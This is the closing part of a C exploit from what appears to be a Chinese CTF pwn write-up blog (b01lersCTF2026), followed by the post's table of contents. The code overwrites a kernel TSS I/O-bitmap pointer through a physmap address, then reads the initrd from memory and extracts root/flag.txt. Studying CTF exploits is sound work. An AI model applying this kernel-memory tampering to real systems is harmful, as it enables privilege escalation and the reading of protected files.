static void print_flag(const uint8_t *buf, size_t len) {
305
    size_t off = 0;
306

307
    while (off + 110 <= len) {
308
        const char *hdr = (const char *)(buf + off);
309
        uint32_t namesize;
310
        uint32_t filesize;
311
        const char *name;
312
        size_t data_off;
313
        size_t next_off;
314

315
        if (memcmp(hdr, "070701", 6) != 0 && memcmp(hdr, "070702", 6) != 0) {
316
            fail("cpio magic not found");
317
        }
318

319
        namesize = hex32(hdr + 94, 8);
320
        filesize = hex32(hdr + 54, 8);
321
        name = (const char *)(buf + off + 110);
322
        data_off = off + 110 + namesize;
323
        data_off = (data_off + 3) & ~((size_t)3);
324
        next_off = data_off + filesize;
325
        next_off = (next_off + 3) & ~((size_t)3);
326

327
        if (off + 110 + namesize > len || next_off > len) {
328
            fail("cpio entry out of bounds");
329
        }
330

331
        if (strcmp(name, "TRAILER!!!") == 0) {
332
            break;
333
        }
334

335
        if (strcmp(name, "./root/flag.txt") == 0 || strcmp(name, "root/flag.txt") == 0) {
336
            fwrite(buf + data_off, 1, filesize, stdout);
337
            if (filesize == 0 || buf[data_off + filesize - 1] != '\n') {
338
                fputc('\n', stdout);
339
            }
340
            return;
341
        }
342

343
        off = next_off;
344
    }
345

346
    fail("flag entry not found in cpio");
347
}
348

349
int main(void) {
350
    uint64_t pm;
351
    uint64_t iomap;
352
    uint8_t *gz;
353
    uint8_t *cpio;
354
    size_t gz_len;
355
    size_t cpio_len;
356

357
    setup_sig();
358
    trip_debug();
359
    pm = get_physmap();
360
    iomap = pm + TSS_PHYS + 0x66;
361

362
    fprintf(stderr, "[*] physmap=%#llx\n", (unsigned long long)pm);
363
    fprintf(stderr, "[*] iomap_base=%#llx\n", (unsigned long long)iomap);
364

365
    poke_iomap(iomap);
366

367
    gz = grab_initrd(&gz_len);
368
    cpio = inflate_gz(gz, gz_len, &cpio_len);
369
    print_flag(cpio, cpio_len);
370
    return 0;
371
}

‍

Mindedness's Blog

b01lersCTF2026 PWN 方向全题解#

Abstract#

Transmutation#

题目分析#

攻击思路 & EXP#

Spelling-Bee#

题目分析#

攻击思路 & EXP#

Priority - Queue#

题目分析#

攻击思路 & EXP#

Micromicromicropython#

题目分析#

攻击思路 & EXP#

ThroughTheWall#

题目分析#

攻击思路 & EXP#

Multifiles#

题目分析#

攻击思路 & EXP#